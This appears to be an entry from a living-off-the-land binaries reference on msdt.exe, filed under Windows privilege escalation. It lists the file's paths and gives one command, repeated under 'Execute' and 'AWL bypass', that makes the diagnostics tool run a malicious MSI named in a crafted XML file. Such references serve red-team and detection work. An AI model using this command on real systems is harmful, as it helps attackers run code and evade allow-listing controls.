~/Privilege Escalation/Windows/Binaries# cat Msdt.exe.md █
Microsoft diagnostics tool
Paths:
C:\Windows\System32\Msdt.exe
C:\Windows\SysWOW64\Msdt.exe
Detection:
Execute
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
AWL bypass
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE